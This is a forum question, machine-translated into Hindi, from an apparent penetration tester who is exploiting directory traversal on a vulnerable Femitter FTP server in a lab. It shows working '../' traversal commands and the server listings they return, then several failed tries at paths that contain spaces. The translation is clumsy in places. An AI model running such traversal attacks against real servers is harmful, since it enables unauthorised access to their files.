मैं एक बंद संदर्भ वातावरण में एक स्वीकृत कीट का संचालन कर रहा हूं, और एक साधारण मुद्दे पर संघर्ष कर रहा हूं, मैं वर्तमान में हल नहीं कर सकता।
जब MS Windows OS पर चलने वाले एक कमजोर Fermitter FTP सर्वर के खिलाफ डायरेक्टरी ट्रैवर्सल हमले को अंजाम देने का प्रयास किया जाता है, तो सिस्टम रूट (केवल संदर्भ के लिए यहां बदली गई सामग्री और लिस्ट) पर LIST करना संभव है:
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root):
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 0 Sep 23 2015 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 0 Sep 23 2015 CONFIG.SYS
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Sep 23 2015 Program Files
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 WINDOWS
226 File sent ok
हालाँकि, यदि मैं एक फ़ोल्डर की सामग्री को सफेद रिक्त स्थान के साथ सूचीबद्ध करना चाहता Documents and settings
हूँ जैसे कि , मैं गोरे स्थानों को अनदेखा करने के कारण निर्देशिका सामग्री को सूचीबद्ध नहीं कर पा रहा हूँ।
ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
मैंने पहले से ही अलग-अलग एफ़टीपी क्लाइंट (सीएलआई और जीयूआई, लिनक्स और विंडोज पर) का उपयोग करने की कोशिश की और या तो वे सफेद रिक्त स्थान को अनदेखा करते हैं या निर्देशिका ट्रैवर्स को अस्वीकार करते हैं।
साथ ही पहले कच्चे सॉकेट्स और फिर ftplib का उपयोग करके पायथन पर हमले की पटकथा को एफएक्स सर्वर पर सीधे एचईएक्स प्रारूप में भेजने के लिए प्रयास किया, लेकिन कोई सफलता नहीं मिली।
कुछ घंटों के लिए गुगली करने से काम का हल नहीं निकलता था (हां, बहुत सारे विकल्प थे, जो काम नहीं करते थे), यही वजह है कि यहां कोई है, जिसके पास एक ही मुद्दा है। बहुत यकीन है, कि यह पहली बार नहीं है जब व्हाइट स्पेस के साथ इस तरह के डायरेक्टरी ट्रैवर्सल की जरूरत है।
\
या निर्देशिका स्ट्रिंग के हवाले से